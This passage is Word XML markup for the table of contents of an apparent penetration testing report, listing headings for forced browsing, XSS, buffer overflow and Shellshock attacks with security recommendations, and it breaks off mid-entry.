                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134038 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FF68943" w14:textId="75F4BD33" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134039" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 Summary of Section</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134039 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FFCB0BF" w14:textId="326A497E" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134040" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.0 Penetration Testing Contingency Policy</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134040 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C156E52" w14:textId="08EDBB41" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134041" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.0 Penetration Testing Framework</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134041 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D361EF3" w14:textId="0301B5F2" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134042" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Penetration Testing Execution Standard (PTES) Framework</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134042 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="604E1DFA" w14:textId="379A25FB" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134043" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.0 Penetration Testing Tools</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134043 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FE0E786" w14:textId="23137F7B" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134044" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.0 Live Penetration Test</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134044 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="621EC224" w14:textId="582B664D" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134045" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 Information Gathering</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134045 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="510ABD56" w14:textId="1B3E799A" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134046" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.1 Summary of Section</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134046 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="240E796A" w14:textId="7B31AC0C" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134047" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2 Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134047 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A54A3EF" w14:textId="0499CE69" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134048" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.1 Attack 1 – Forced Browsing Attack</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134048 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C21EC26" w14:textId="446532B3" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134049" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.1.1 Security Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134049 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C6D7653" w14:textId="62065A59" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134050" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.2 Attack 2 – Isoka Cedric E-Mail Reader 0.4 XSS vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134050 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E612631" w14:textId="0D208CB3" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134051" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.2.1 Security Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134051 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0003100E" w14:textId="42A01F64" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134052" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.3 Attack 3 – Buffer Overflow Attack</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134052 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="108B8BEE" w14:textId="421B171B" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134053" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.3.1 Security Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134053 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5483EEB2" w14:textId="3E0CE4F3" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134054" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.4 Attack 4 – Shellshock Exploit</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134054 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
